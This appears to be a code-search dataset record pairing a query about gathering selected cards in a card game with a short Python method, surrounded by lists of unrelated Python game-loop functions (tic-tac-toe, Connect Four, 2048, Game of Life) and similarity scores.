['s']:\n loop = False\n sendMove(s, 'down')\n elif move in ['d']:\n loop = False\n sendMove(s, 'right')\n elif move in ['a']:\n loop = False\n sendMove(s, 'left')\n else:\n print(\"Please choose either: 'up', 'down', 'left', or 'right'. Thank you.\") # In case the user is trying to break the system :(\n debugPrint(\"User input an unknown direction: %s\" % move, 1)", "def game(self):\n sender = self.sender()\n if(sender.text() == \" \"):\n sender.setText(\"x\" if self.firstPlayer else \"0\")\n self.firstPlayer = not(self.firstPlayer)\n res = self.checkForResult()\n if(res[0] == True):\n self.endGame(res[1])", "def play(self):\n \n while True:\n self.print_board()\n self.display_board()\n winner = self.is_game_won()\n if winner or self.is_filled():\n break\n \n if self.turn == _PLAYER:\n col = self.human_turn()\n else:\n col = self.ai_turn()\n\n row = self.get_row_for_col(col)\n self.board[7 * row + col] = self.turn\n self.last_play_rc = row, col\n\n if self.debug:\n print(\"position scores:\",\n \"player=\", score_position(self.board, _PLAYER),\n \"ai=\", score_position(self.board, _AI))\n \n self.turn = _AI if self.turn == _PLAYER else _PLAYER\n \n if winner == 0:\n msg = \"Tie!\"\n elif winner == 1:\n msg = \"You win!\"\n else:\n msg = \"I win!\"\n \n oled.text(msg, 64, 30)\n oled.show()\n print(\"\\n\" + msg + \"\\n\")\n \n if winner == 0 or winner == 1:\n if self.plies == 3:\n print(\"\"\"\n(Of course, you did set me to easy mode, which I feel compelled to mention.)\n\"\"\")\n print(\"\"\"\n\nThere are some interesting things to learn about ConnectFour:\n\n {url}\n\nTo move ahead:\n\n >>> import sensors\n >>> sensors.start()\n\n\"\"\".format(url=url(\"connectfour\")))\n\n else:\n print(\"\"\"\nWow. You were beat by a $4 computer--using only one of my processors (!!).\nTo get the code to move ahead, you'll need to at least tie me.\n\nTo play again, make a new instance of the ConnectFour class. You can choose\ndifferent options than the defaults:\n\n connectfour.ConnectFour(plies, start_player, serial_input, debug)\n - plies [5]: moves to look ahead (3-6, where 3 is easy and 6 is slow and hard\n - start_player [0]: 0 for random, 1 for you, 2 for me\n - serial_input [False]: Enter moves w/keyboard in terminal instead of knob\n - debug [False]: Show information about current AI evaluation scores\n\nFor example:\n\n >>> g = ConnectFour(plies=4, start_player=1)\n >>> g.play()\n\n\"\"\")", "def start_play(self, player1, player2, start_player=0, is_shown=1): # 下棋\n line = input().strip()\n full_input = json.loads(line)\n requests = full_input['requests']\n x = requests[0]['x']\n y = requests[0]['y']\n if x < 0:\n start_player = 1\n else:\n start_player = 0\n self.board.init_board(start_player) # 初始化棋盘\n p1, p2 = self.board.players # 两个棋手\n player1.set_player_ind(p1)\n player2.set_player_ind(p2)\n players = {p1: player1, p2: player2}\n if x >= 0:\n current_player = self.board.get_current_player() # 获取当前棋手\n player_in_turn = players[current_player]\n move = 80 - (x + 1) * 9 + y + 1\n self.board.do_move(move) # 进行落子\n while True:\n current_player = self.board.get_current_player() # 获取当前棋手\n player_in_turn = players[current_player]\n # self.board.set_current_availables() # 设定当前使用的availables\n move = player_in_turn.get_action(self.board)\n self.board.do_move(move) # 进行落子", "def advance_board(self):\n raise NotImplementedError", "def getInput():\t\n\tglobal active_\n\n\t#to disable the service \n\tactive_ = False \n\t\n\t# reading the previous input\n\tprev_input_ = rospy.get_param('/input')\n\tinput_ = prev_input_\n\t\n\t#in order to make the user to choose one of the 5 possible inputs\n\twhile (prev_input_ == input_) or (input_ > 5 or input_ < 1):\n\t\tif input_ > 5 or input_ < 1: \n\t\t\t#in the case in which the user make another selection\n\t\t\tprint \"Unknown input, please try again\" \n\t\t\n\t\t#propose to the user which are the real possibilities\n\t\tprint(\"Please select one of the following senteces\\n\")\n\t\tprint(\"1 - Move the robot randomly in the environment, by choosing one of six possible target positions\\n\")\n\t\tprint(\"2 - The user can chose the next target position\\n\")\n\t\tprint(\"3 - Start following the external walls\\n\")\n\t\tprint(\"4 - Stop the robot in the last position\\n\")\n\t\tprint(\"5 - Change the planning algorithm from move_base to bug0 and vice versa\\n\")\n\n\t\t#read the input typed by the user\t\n\t\tinput_ = (int(raw_input(\"Please select a number between 1 and 5: \")))\n\n\t#set the choice made by the user\n\tif input_ >= 1 and input_ <= 5:\n\t\trospy.set_param('/input', input_)", "def start_game(self):\n p1_move = True\n is_all_moves_over = False\n while not is_all_moves_over:\n\n while p1_move and not is_all_moves_over:\n p1 = int(input(\"Player 1 pos:\"))\n is_all_moves_over, p1_move = self.play('p1', p1, p1_move)\n\n while not p1_move and not is_all_moves_over:\n p2 = int(input(\"Player 2 pos:\"))\n is_all_moves_over, p1_move = self.play('p2', p2, p1_move)\n\n print(\"Game Ended in Draw\")", "def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")", "def human():\n table = [ \n \"-\", \"-\", \"-\", \n \"-\", \"-\", \"-\", \n \"-\", \"-\", \"-\", \n ]\n choices = choice()\n turn = [0,1,2,3,4,5,6,7,8]\n\n # while table still have available space, run until all boxes are filled\n while len(turn) != 0:\n \n # Player1's turn\n move_index, turn = table_check(table, turn) # Check if the index is valid\n table[move_index] = choices[0] # Fill X or O to the table base on the index chosen\n display_board(table) # Display to let them see for 2nd player's turn\n\n # The game cannot be won unless 5 moves has been played, so when turn has been reduced to 4 moves or less, check win\n # Check win before tie since last move might make it a win\n if len(turn) <= 4:\n win_condition, player = win_check(table)\n if win_condition == True:\n print(f\"\\nPlayer \\\"{player}\\\" won!!\\nThanks for playing!\")\n retry()\n\n # Player 1 will be the one who finish the game, so after filling every turn of player 1\n # we need to check if it's the last turn, if yes than break\n if len(turn) == 0:\n break\n \n # Player2's turn\n move_index, turn = table_check(table, turn) # Check if the index is valid\n table[move_index] = choices[1] # Fill X or O to the table base on the index chosen\n display_board(table) # Display to let them see for 2nd player's turn\n\n # The game cannot be won unless 5 moves has been played, so when turn has been reduced to 4 moves or less, check win\n if len(turn) <= 4:\n win_condition, player = win_check(table)\n if win_condition == True:\n print(f\"\\nPlayer \\\"{player}\\\" won!!\\nThanks for playing!\")\n retry()\n \n print(\"\\nDRAW!\")\n retry()", "def playGame(wordList):\n while True:\n user_input = str(input('Enter n to deal a new hand, r to replay the last hand, or e to end game: '))\n if user_input == 'e':\n break\n elif user_input == 'n':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n elif user_input == 'r':\n try:\n playHand(hand, wordList, HAND_SIZE)\n except:\n print('You have not played a hand yet. Please play a new hand first!') \n else:\n print('Invalid command.')", "def human_move(board,player):\r\n \r\n s = input(\"Please input a legal move in a format of \\\"current_position-landing_position\\\", if the move is cantering or plain. In case of a capturing move, follow \\\"current_position-landing_position-enemy piece\\\": \")\r\n move = s.split('-')\r\n legal = legal_moves(board,player)\r\n execution(move,legal,board,player)", "def main():\n\n print('R-In-A-Row')\n print()\n\n while True:\n if play == 'human vs human':\n human1Tile, human2Tile = enterHuman1Tile()\n\n turn = whoGoesFirst()\n print('The %s player will got first.' % (turn))\n mainBoard = getNewBoard()\n elif play == 'human vs computer':\n human1Tile, computer1Tile = enterHuman1Tile()\n turn = whoGoesFirst()\n print('The %s player will go first.' % (turn))\n mainBoard = getNewBoard()\n elif play == 'computer vs computer':\n computer1Tile, computer2Tile = enterHuman1Tile()\n turn = whoGoesFirst()\n print('The %s player will go first.' % (turn))\n\n\n while True:\n if play == 'human vs human':\n if turn == 'human1':\n drawBoard(mainBoard)\n move = getHuman1Move(mainBoard)\n\n makeMove(mainBoard, human1Tile, move)\n\n if isWinner(mainBoard, human1Tile):\n winner = 'human1'\n\n break\n turn = 'human2'\n if turn == 'human2':\n drawBoard(mainBoard)\n move2 = getHuman2Move(mainBoard)\n makeMove(mainBoard, human2Tile, move2)\n if isWinner(mainBoard, human2Tile):\n winner = 'human2'\n break\n turn = 'human1'\n\n elif play == 'human vs computer' :\n if turn == 'human':\n drawBoard(mainBoard)\n move = getHuman1Move(mainBoard)\n makeMove(mainBoard, human1Tile, move)\n if isWinner(mainBoard, human1Tile):\n winner = 'human'\n\n break\n turn ='computer'\n\n elif turn == 'computer':\n drawBoard(mainBoard)\n print('The computer is thinking...')\n move = getComputer1Move(mainBoard, computer1Tile)\n makeMove(mainBoard, computer1Tile, move)\n if isWinner(mainBoard, computer1Tile):\n winner = 'computer'\n break\n turn = 'human'\n elif play == 'computer vs computer':\n if turn == 'computer1':\n drawBoard(mainBoard)\n print('computer1 is thinking...')\n move = getComputer1Move(mainBoard, computer1Tile)\n makeMove(mainBoard, computer1Tile, move)\n if isWinner(mainBoard, computer1Tile):\n winner = 'computer1'\n break\n turn = 'computer2'\n elif turn == 'computer2':\n drawBoard(mainBoard)\n print('computer2 is thinking...')\n move = getComputer2Move(mainBoard, computer2Tile)\n makeMove(mainBoard, computer2Tile, move)\n if isWinner(mainBoard, computer2Tile):\n winner = 'computer2'\n break\n turn = 'computer1'\n\n\n if isBoardFull(mainBoard):\n winner = 'tie'\n break\n\n drawBoard(mainBoard)\n print('Winner is: %s' % winner)\n if not playAgain():\n break", "def requestMove(self) -> None:\n\n # player's turn to make a move\n if self.whoseTurn == self.player:\n position: int = int(input(f\"{self.player.getName()}'s turn : \"))\n self.player.insertSymbol(position)\n self.whoseTurn = self.ai\n\n # AI's turn to make a move\n else:\n print(f\"{self.ai.getName()}'s turn\")\n self.ai.makeBestMove()\n self.whoseTurn = self.player", "def play_one_move(self):\n self.print(\"top of move\")\n # 1) grab three cups\n c1 = self.take_cup_after(self.current_cup_idx())\n c2 = self.take_cup_after(self.current_cup_idx())\n c3 = self.take_cup_after(self.current_cup_idx())\n print(f\"pick up: {c1}, {c2}, {c3}\")\n self.print(\"after pickup\")\n\n # 2) find a destination cup\n destination_idx = self.find_next_destination(self.current_cup)\n print(\n f\"destination index is {destination_idx}, cup is {self.cups[destination_idx]}\"\n )\n\n # 3) insert cups back into the circle\n self.add_cups(destination_idx, [c1, c2, c3])\n self.print(\"after adding cups..\")\n\n # 4) select the next cup\n self.select_next_cup()\n\n self.print(\"post move\")", "def askformove(b):\n while True:\n print(b)\n userInput = input(\"enter your move \")\n try:\n userInput= int(userInput)\n assert(userInput <= b.width )\n assert(b.allowsMove(userInput))\n except (ValueError,AssertionError):\n print(\"enter a diff move\")\n continue\n return userInput", "def handle_turn(cls, key):\n entered = str(key).replace(\"'\", \"\")\n\n if entered in ['a','s','d','w']:\n switcher = {\n 'w': cls.up,\n 's': cls.down,\n 'a': cls.left,\n 'd': cls.right,\n }\n switcher.get(entered)()\n cls.display_board(True)\n \n elif entered in cls.positions:\n cls.position = int(entered) - 1\n\n elif entered == 'Key.enter':\n row, col = cls.get_position_coords()\n if cls.board[row][col] == cls.empty:\n # Board will place an X or O on the number slot chosen\n cls.board[row][col] = cls.current_player\n\n # Check if the game has ended\n cls.is_game_over()\n\n # Flip to other player\n cls.flip_player()\n\n # Declare winner and clear board\n if(cls.winner):\n print(f'{cls.winner} wins!')\n input('Press enter to play again.')\n cls.clear_board()\n else:\n print(\"You can't go there. Asshole.\")", "def run(self):\n print(\"WELCOME TO MINESWEEPER!\")\n\n\n while True:\n\n self.get_input()\n start_game(self.rows, self.cols, self.mines)", "def getMove(player,first_move=False):\n while True: \n move = raw_input(\"MAKE YOUR MOVE: \").upper()\n\n # handle special commands\n if move == \"QUIT\" or move == \"Q\":\n wannaQuit()\n continue\n elif move == \"QUIT!\" or move == \"Q!\":\n if SAY_PROC:\n SAY_PROC.terminate()\n sys.exit()\n continue\n elif move == \"HELP\" or move == \"H\":\n help()\n continue\n elif move == \"HELP!\" or move == \"H!\":\n say(helpString())\n continue\n elif move == \"SHUTUP!\" or move == \"S!\":\n shutUp(fuck=True)\n continue\n elif move == \"SHUTUP\" or move == \"S\":\n shutUp()\n continue\n elif move == \"BOARD\" or move == \"B\":\n printBoard()\n continue\n elif move == \"CLEAR\" or move == \"C\": \n clearTerminal()\n printBoard()\n continue\n elif move == \"CLEAR!\" or move == \"C!\": # TODO board -> clear, you end up with a half drawn new board. clear again fixes this\n clearTerminalAndBuffer()\n printBoard()\n continue\n elif move == \"PASS\" or move == \"P\": \n if wannaPass():\n break\n else:\n continue\n elif move == \"PASS!\" or move == \"P!\": \n break\n \n # mostly used to catch blank lines or me typing ASFADS like an asshole\n if len(move) < 7:\n print \"That's too short to be a command.\"\n continue\n\n parts=move.split(\":\")\n if len(parts) != 3:\n print \"Can't find all the parts of the move command. Maybe you're missing/have too many \\\":\\\"?\"\n continue\n\n for item in parts:\n if len(item) == 0:\n print \"Found a blank command. Maybe you left in an extra \\\":\\\"?\"\n continue\n\n coords = parts[0].replace(\" \",\"\") # incase of space inbetween file and rank\n direction = parts[1].strip()\n word = parts[2].strip()\n\n if not coords[0].isalpha():\n print \"I don't know where to put your word (Bad file coord).\"\n continue\n\n if not coords[1:].isdigit():\n print \"I don't know where to put your word (Bad rank coord).\"\n continue\n\n x = gridCharToInt(coords[0])\n y = int(coords[1:]) - 1\n if 14 < x < 0 or 14 < y < 0:\n print \"Those aren't coords on the board. Valid Files are from A-O, valid Ranks are 1-15.\"\n continue\n\n if first_move:\n if x != 7 or y != 7:\n print \"The first move must start from the center (H8).\"\n continue\n\n #compact that command\n if direction == \"ACROSS\":\n direction = \"A\"\n elif direction == \"DOWN\":\n direction = \"D\"\n if direction != \"A\" and direction !=\"D\":\n print \"I don't know where to put your word (Across or Down?).\"\n continue\n \n score,placed_tiles = checkWords(x,y,direction,word,first_move)\n if not score: #error reporting is handling in check words\n continue\n else:\n for tile in placed_tiles:\n if not tile in player.rack:\n print \"You don't have the tiles to play that!\"\n continue\n player.rack.remove(tile)\n print player.name+\" scored \"+str(score)+\" on that last play!\"\n player.score+=score\n for tile in placed_tiles:\n player.rack.remove(tile)\n break #YAY", "def main():\n\tcolorama.init()\n\n\n\n\tgrid = get_start_grid(*map(int,sys.argv[1:]))\n\tprint_grid(grid)\n\n\twhile True:\n\t\tgrid_copy = copy.deepcopy(grid)\n\t\tget_input = getch(\"Enter direction (w/a/s/d/n/r/q): \")\n\t\tif get_input in functions:\t\n\t\t\tfunctions[get_input](grid)\n\t\telif get_input == \"n\":\n\t\t\tif get_next_action(grid) == '':\n\t\t\t\tprint(\"Checkmate!\")\n\t\t\t\tbreak\n\t\t\tfunctions[get_next_action(grid)](grid)\n\t\telif get_input == \"r\":\n\t\t\tbreak\n\t\telif get_input == \"q\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\nInvalid choice.\")\n\t\t\tcontinue\n\t\tif grid != grid_copy:\n\t\t\tif not prepare_next_turn(grid):\n\t\t\t\tprint_grid(grid)\n\t\t\t\tprint(\"Well played!\")\n\t\t\t\tbreak\n\t\tprint_grid(grid)\n\t\n\tif get_input == \"r\":\n\t\twhile True:\n\t\t\tgrid_copy = copy.deepcopy(grid)\n\n\t\t\tnext_action = get_next_action(grid)\n\t\t\tif next_action == '':\n\t\t\t\tprint(\"Checkmate!\")\n\t\t\t\tbreak\n\t\t\t\n\t\t\tfunctions[next_action](grid)\n\t\t\tif grid != grid_copy:\n\t\t\t\tif not prepare_next_turn(grid):\n\t\t\t\t\tprint_grid(grid)\n\t\t\t\t\tprint(\"Well played!\")\n\t\t\t\t\tbreak\n\t\t\tprint_grid(grid)\n\n\tprint(\"Thanks for playing.\")", "def play_game():\n clear()\n print(\" 1 | 2 | 3 \\n --- --- --- \\n\"\n \" 4 | 5 | 6 \\n --- --- --- \\n\"\n \" 7 | 8 | 9 \")\n player = 'Player_one'\n continue_game = True\n while continue_game:\n position = game.ask(player=player)\n if position is False:\n print(\"Please enter a number from 1-9.\")\n position = game.ask(player=player)\n clear()\n update_and_switch = game.update_and_switch(position, player=player)\n if update_and_switch is False:\n position = game.ask(player=player)\n game.update_and_switch(position, player=player)\n else:\n player = game.switch_player(player)\n continue_game = game.evaluate_winner()\n\n restart = input(\"Do you want to play again? (yes or no)\\n\").lower()\n if restart == 'yes':\n game.list = [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\n play_game()\n\n else:\n clear()\n print(\"Bye 👋 Hope you had fun!\")", "def player_loop(self):\n\n # Generate game tree object\n first_msg = self.receiver()\n # Initialize your minimax model\n model = self.initialize_model(initial_data=first_msg)\n\n while True:\n msg = self.receiver()\n\n # Create the root node of the game tree\n node = Node(message=msg, player=0)\n\n # Possible next moves: \"stay\", \"left\", \"right\", \"up\", \"down\"\n best_move = self.search_best_next_move(\n model=model, initial_tree_node=node)\n\n # Execute next action\n self.sender({\"action\": best_move, \"search_time\": None})", "def example(self):\n while self.check_end() == False:\n plt.pause(0.25)\n end = self.update_board(random.choice(self.get_actions()), True)", "def interact():\r\n\tboard = None\r\n\tline = raw_input(\"Enter Command (h for help): \")\r\n\tline = line.replace(\" \", \"\")\r\n\twhile line and line[0] != \"q\":\r\n\t\tcommand = line[0]\r\n\t\tif command == 'n': \r\n\t\t\tcoordinates = ast.literal_eval(line[1:])\r\n\t\t\trows = coordinates[0]\r\n\t\t\tcols = coordinates[1]\r\n\t\t\tboard = createBoard(int(rows),int(cols))\r\n\t\telif command == 'i':\r\n\t\t\tliveCells = ast.literal_eval(line[1:])\r\n\t\t\tfor cells in liveCells:\r\n\t\t\t\tboard[cells[0]-1][cells[1]-1] = 1\r\n\t\telif command == 'p':\r\n\t\t\tprintBoard(board)\r\n\t\telif command == 'r':\r\n\t\t\tnumOfGens = ast.literal_eval(line[1:])\r\n\t\t\tfor n in range(numOfGens):\r\n\t\t\t\tboard = next_life_generation(board)\r\n\t\t\t\tprintBoard2(board)\r\n\t\telif command == 's':\r\n\t\t\tprintBoard2(board)\r\n\t\telif command == 'd':\r\n\t\t\tprintBoard2(board)\r\n\t\telif command == 'h':\r\n\t\t\tprint(\"\"\" \r\nCommands:\r\nn\t[height,width] (Create a height * width board)\r\ni\t(initialize life)\r\np\t(print the board)\r\ns\t(display the board)\r\nr\t(advance n generations, displaying each after)\r\nh\t(display this help reminder)\r\n\r\nq\t(quit)\"\"\")\r\n\t\tline = raw_input(\"Enter Command (h for help): \")\r\n\t\tline = line.replace(\" \", \"\")\r\n\tprint \"Life is over\\n\"", "def choose_action(self, board, possible_actions):\r\n self._print_board(board)\r\n while True:\r\n user_choice = int(input(\"Which Field?\"))\r\n if user_choice in possible_actions:\r\n return user_choice\r\n else:\r\n print('Action not possible!')" ]
[ "0.72409004", "0.64886266", "0.6171364", "0.59191036", "0.59139985", "0.5860547", "0.57915825", "0.5791442", "0.5777218", "0.57734597", "0.5769721", "0.5763385", "0.5751395", "0.5743939", "0.5728276", "0.5692042", "0.56845224", "0.5682954", "0.56781256", "0.56780386", "0.5671816", "0.5670868", "0.56655097", "0.5663507", "0.56496686", "0.55943656", "0.5592782", "0.55787945", "0.55751777", "0.55740297", "0.5563226", "0.55628335", "0.554938", "0.55492765", "0.5539126", "0.553318", "0.55285054", "0.5524531", "0.5521579", "0.55104035", "0.5504342", "0.5501734", "0.5501111", "0.5498762", "0.54937494", "0.549218", "0.5491433", "0.5478397", "0.5478195", "0.54765", "0.54728746", "0.5472133", "0.5466114", "0.5455482", "0.5454376", "0.54515916", "0.5443353", "0.5435266", "0.54266477", "0.5424331", "0.54232806", "0.5421104", "0.54192513", "0.5416677", "0.5414112", "0.5404775", "0.54008293", "0.53854054", "0.5355538", "0.53508055", "0.53507966", "0.5330017", "0.53268033", "0.5326353", "0.5325953", "0.5322363", "0.53219473", "0.5319936", "0.5316884", "0.5312331", "0.5311735", "0.5310094", "0.53096145", "0.5309493", "0.5302804", "0.5302266", "0.529988", "0.52980065", "0.5292381", "0.52897596", "0.5285153", "0.52786034", "0.52785814", "0.5277133", "0.52750534", "0.52748126", "0.5273247", "0.5272842", "0.5272222", "0.52721655" ]
0.6859589
1
gathers selected cards in order to take action on selected cards (either discarding them or preparing them)
def gatherSelected(self): self.selected_list = [] for element in self.hand_info: if element.status == 1: self.selected_list.append(element) return self.selected_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick(self, pack, cards_owned, draft_info):\n pass", "def card_sel(\n self, num=1, **kwargs\n ): # pylint: disable=too-many-locals, too-many-branches\n selectfrom = self.card_selSource(**kwargs)\n force = kwargs[\"force\"] if \"force\" in kwargs else False\n showdesc = kwargs[\"showdesc\"] if \"showdesc\" in kwargs else True\n verbs = kwargs.get(\"verbs\", (\"Select\", \"Unselect\"))\n\n if \"prompt\" in kwargs:\n self.output(kwargs[\"prompt\"])\n\n if \"anynum\" in kwargs and kwargs[\"anynum\"]:\n anynum = True\n num = 0\n else:\n anynum = False\n\n selected = []\n types = kwargs[\"types\"] if \"types\" in kwargs else {}\n types = self._type_selector(types)\n while True:\n options = []\n if (\n anynum\n or (force and num == len(selected))\n or (not force and num >= len(selected))\n ):\n o = Option(selector=\"0\", verb=\"Finish Selecting\", card=None)\n options.append(o)\n index = 1\n for c in sorted(selectfrom):\n if \"exclude\" in kwargs and c.name in kwargs[\"exclude\"]:\n continue\n if not self.select_by_type(c, types):\n continue\n sel = \"%d\" % index\n index += 1\n if c not in selected:\n verb = verbs[0]\n else:\n verb = verbs[1]\n o = Option(selector=sel, verb=verb, card=c, name=c.name)\n if showdesc:\n o[\"desc\"] = c.description(self)\n if kwargs.get(\"printcost\"):\n o[\"details\"] = str(self.card_cost(c))\n if kwargs.get(\"printtypes\"):\n o[\"details\"] = c.get_cardtype_repr()\n options.append(o)\n ui = self.user_input(options, \"Select which card?\")\n if not ui[\"card\"]:\n break\n if ui[\"card\"] in selected:\n selected.remove(ui[\"card\"])\n else:\n selected.append(ui[\"card\"])\n if num == 1 and len(selected) == 1:\n break\n return selected", "def card(bot, update):\n query = update.callback_query\n user = query.from_user\n chat_id = query.message.chat_id\n selected_card = query.data\n\n if (chats[chat_id].player1.card_played == []) and (chats[chat_id].player2.card_played == []):\n bot.send_message(text=Strings.CARD_SELECTED.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN,\n isgroup=True)\n if chats[chat_id].player1.user == user:\n chats[chat_id].player1.card_played = chats[chat_id].player1.hand[int(selected_card)]\n chats[chat_id].player1.hand.remove(chats[chat_id].player1.hand[int(selected_card)])\n\n elif chats[chat_id].player2.user == user:\n chats[chat_id].player2.card_played = chats[chat_id].player2.hand[int(selected_card)]\n chats[chat_id].player2.hand.remove(chats[chat_id].player2.hand[int(selected_card)])\n return CARD\n\n else:\n if chats[chat_id].player1.user == user and chats[chat_id].player1.card_played != []:\n bot.send_message(text=Strings.CARD_SELECTED2.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return CARD\n elif chats[chat_id].player2.user == user and chats[chat_id].player2.card_played != []:\n bot.send_message(text=Strings.CARD_SELECTED2.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return CARD\n else:\n if chats[chat_id].player1.user == user:\n chats[chat_id].player1.card_played = chats[chat_id].player1.hand[int(selected_card)]\n chats[chat_id].player1.hand.remove(chats[chat_id].player1.hand[int(selected_card)])\n\n elif chats[chat_id].player2.user == user:\n chats[chat_id].player2.card_played = chats[chat_id].player2.hand[int(selected_card)]\n chats[chat_id].player2.hand.remove(chats[chat_id].player2.hand[int(selected_card)])\n\n bot.edit_message_text(text=Strings.CARD_SELECTED.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN)\n bot.send_message(chat_id,\n Strings.SELECTION_COMPLETED,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n\n reply_markup = ReplyKeyboardMarkup(c_b_keyboard, selective=False)\n bot.send_message(chat_id,\n Strings.QUESTION,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return BET_CHECK", "def choose_card(playable_cards):\r\n\r\n playing = playable_cards[0]\r\n print('\\n choosing \\n', playing)\r\n\r\n return playing # for now\r", "def next_card_selection(deck):\n # First grab the colors and format\n # Then generate the query, execute, and trim\n # Then get the selections, and return them!\n colors = deck['colors']\n deck_format = deck['format']\n seed = deck.get('seed')\n\n query_type = pick_next_card_query(deck_format, seed)\n trimmed_query_results = compile_execute_and_trim_query(colors, query_type, deck_format)\n selections = generate_pickable_selections(trimmed_query_results, deck_format, deck)\n print('QUERY: ', query_type, ' NUM RESULTS:', len(trimmed_query_results))\n\n return selections", "def choose_card_to_discard(self):\n random.choice(self.hand.card_list).use()", "def select_card(self, cards):\n idx = -1 # should not be inital value\n while True:\n print(\"Please select a card by index:\")\n inpt = self.input(list(enumerate(cards)))\n try:\n idx = int(inpt)\n except ValueError:\n print(f\"'{inpt}' is not a valid index.\")\n if idx < 0 or idx >= len(cards):\n print(f\"The index {idx} is not available.\")\n else:\n break\n assert idx != -1 # make sure it's not initial value\n return cards.pop(idx)", "def cards(self, cards):\n\n self._cards = cards", "def cards(self, cards):\n\n self._cards = cards", "def choose_card(self, state=None):\n # if self.at_last_stich():\n # allowed = yield self.cards[0]\n # else:\n self.observation_received.acquire()\n self.observation = self.build_observation(state, self.cards)\n logger.debug(f\"choose_card received observation: {self.observation}\")\n self.observation_received.notify_all() # notify all threads to be sure\n self.observation_received.release()\n\n self.action_received.acquire()\n received = self.action_received.wait()\n if not received:\n logger.debug(\"Timeout occurred. action_received condition has not been notified.\")\n logger.debug(f\"choose_card received action: {self.action}\")\n allowed_cards = self.allowed_cards(state=state)\n chosen_card = allowed_cards[0] # set chosen_card to the first allowed card in case anything goes south\n chosen_card = self.set_chosen_card(allowed_cards, chosen_card)\n self.action_received.release()\n\n allowed = yield chosen_card\n\n if allowed:\n yield None", "def set_chosen_card(self, allowed_cards, chosen_card):\n if self.action is not None:\n if self.action in allowed_cards:\n logger.info(f\"Successfully chose the card: {self.action}\")\n chosen_card = self.action\n else:\n logger.error(f\"{self.action} is not a valid card! Choosing the first allowed card now.\")\n else:\n logger.debug(\"chosen card is None\")\n return chosen_card", "def play_selected_card(_screen, player):\n card = Card(player.selected_card.card_id, 400, 350)\n card.image_of_card(_screen)", "def play_all(self):\n for _ in range(self._hand.size()):\n card = self._hand.pop()\n self._active.push(card)\n self._money = self._money + card.money\n self._attack = self._attack + card.attack\n print '\\nPlayed all cards!'", "def deal_cards():\n for _ in range(2):\n user_cards.append(random.choice(deck))\n dealer_cards.append(random.choice(deck))", "def cards(self) -> None:\n self._cards = []", "def Deal():\r\n cardsout = []\r\n cardoptions = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]\r\n topcardoptions = [0,2,3,4,5,6]\r\n topcard = topcardoptions[random.randint(0,5)]\r\n cardoptions.pop(cardoptions.index(topcard))\r\n cardsout.append(topcard)\r\n\r\n if SHOWHAPPENINGS == True:\r\n disp = card_dict[topcard]\r\n print(\"Topcard is: {}\".format(disp)) \r\n\r\n for i in range(4):\r\n numcards = 0\r\n while numcards < 5:\r\n possiblerange = len(cardoptions) - 1\r\n cardindex = random.randint(0,possiblerange)\r\n card = cardoptions[cardindex]\r\n cardsout.append(card)\r\n cardoptions.pop(cardoptions.index(card))\r\n PlayerHands[i].append(card)\r\n numcards += 1\r\n PlayerHands[i] = sorted(PlayerHands[i]) #putting into ascending order\r\n if i == 0 or i == 2:\r\n PlayerHands[i].append(\"RedTeam\")\r\n else: \r\n PlayerHands[i].append(\"BlackTeam\")\r\n \r\n PlayerHands[0].append(PLAYER1)\r\n PlayerHands[1].append(PLAYER2)\r\n PlayerHands[2].append(PLAYER3)\r\n PlayerHands[3].append(PLAYER4)\r\n #PlayerHand format = [card1,card2,card3,card4,card5,Team,Name]\r\n\r\n return topcard", "def going_out(self, cards):\n for card in cards:\n self.out_of_use.append(int(card))\n # print(self.out_of_use)", "def followUpAttack(self, validCards):\n print(\"Select card from... \")\n cardManager.printHand(validCards)\n card = int(input(\"to your attack: \"))\n while card not in validCards: # error checking\n print(card)\n print(\"Please select a valid card from...\")\n cardManager.printHand(validCards)\n card = int(input(\"to your attack: \"))\n self.currentHand.remove(card)\n card = self.checkDoubles(card)\n return card", "def clearCards(self):\r\n self.cards = []", "def __init__(self):\r\n self.cards = []", "def open_cards(self) -> None:\r\n self.dealer.deal_cards_to(self.card_stack, PokerRules.CARDS_PER_ROUND[self.round_num])", "def get_card_list(self):\n return self.cards", "def __init__(self):\n self._cards = []", "def upgrade_all_cards(self):\n self.game.go_to_comic_cards()\n logger.info(\"Comic Cards: upgrading all available cards.\")\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3, ui_element=self.ui['CARDS_UPGRADE_ALL']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_ALL'].button)\n for card_index in range(1, 6):\n card_select_ui = self.ui[f'CARDS_SELECT_GRADE_{card_index}']\n self.emulator.click_button(card_select_ui.button)\n logger.debug(f\"Comic Cards: starting to upgrade UI Element {card_select_ui.name}\")\n if not wait_until(self.emulator.is_image_on_screen, timeout=3, ui_element=card_select_ui):\n logger.warning(\"Comic Cards: can't select card's grade.\")\n continue\n logger.debug(f\"Comic Cards: successfully selected UI Element {card_select_ui.name}\")\n self.emulator.click_button(self.ui['CARDS_SELECT_GRADE'].button)\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3,\n ui_element=self.ui['CARDS_UPGRADE_CONFIRM']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_CONFIRM'].button)\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=10,\n ui_element=self.ui['CARDS_UPGRADE_RESULTS_OK']):\n logger.debug(f\"Comic Cards: successfully upgraded UI Element {card_select_ui.name}\")\n 